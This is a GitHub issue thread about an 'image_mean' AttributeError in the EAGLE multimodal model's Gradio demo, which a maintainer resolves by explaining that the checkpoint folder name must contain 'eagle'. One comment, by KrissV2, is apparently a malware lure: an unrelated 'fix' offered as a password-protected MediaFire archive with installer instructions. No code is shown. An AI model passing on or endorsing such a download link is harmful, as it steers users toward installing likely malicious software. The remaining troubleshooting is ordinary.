### ISSUE TITLE
AttributeError: 'NoneType' object has no attribute 'image_mean'

### ISSUE THREAD

**Issue by fahdmirza** [NVlabs/EAGLE#6]
Hi,
 I am trying to run this model locally by using following commands but getting error:

`conda create -n eagle python=3.10 -y && conda activate eagle

git clone https://github.com/NVlabs/EAGLE.git && cd EAGLE

pip install --upgrade pip
pip install -r requirements.txt

python3 gradio_demo.py --model-path /home/Ubuntu/.cache/huggingface/hub/models--NVEagle--Eagle-X5-7B/snapshots/84b747f38b779fde32188679ff1437226368fbc7  --conv-mode vicuna_v1
`

The above downloads various models and I am able to access gradio demo in browser but when I select an image and ask a question, it gives ERROR:

  File "/home/Ubuntu/miniconda3/envs/eagle/lib/python3.10/site-packages/gradio/utils.py", line 678, in gen_wrapper
    response = next(iterator)
  File "/home/Ubuntu/EAGLE/gradio_demo.py", line 128, in generate
    images = process_images(images, image_processor, model.config)
  File "/home/Ubuntu/EAGLE/eagle/mm_utils.py", line 187, in process_images
    image = expand2square(image, tuple(int(x*255) for x in image_processor.image_mean))
AttributeError: 'NoneType' object has no attribute 'image_mean'

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by flyinglynx** [comment]
Hi, thank you for your interest!

It seems that the issue might be related to the checkpoint path you're using. You're currently using the path directly from Hugging Face's cache. Following llava's code base, we still distinguish multi-modal and pure language models by checking whether "llava" or "eagle" is part of the checkpoint path's base name. Could you please try adding an "eagle" prefix to the folder name and see if that resolves the issue?

For your reference, here is the relevant code:
https://github.com/NVlabs/EAGLE/blob/d5db8db3e5423893c1c06f4d88c58569380f953e/eagle/model/builder.py#L145C1-L146C1

**Comment by fahdmirza** [comment]
All good, I was able to install it and have shared step by step installation instructions on my channel https://youtu.be/0-md0S9GDJA?si=20yjQlthlKPTC87s  . Thanks.

regards,
Fahd

**Comment by flyinglynx** [comment]
Thank you for your video! The string matching is not a good way, we also make similar mistakes. 😂
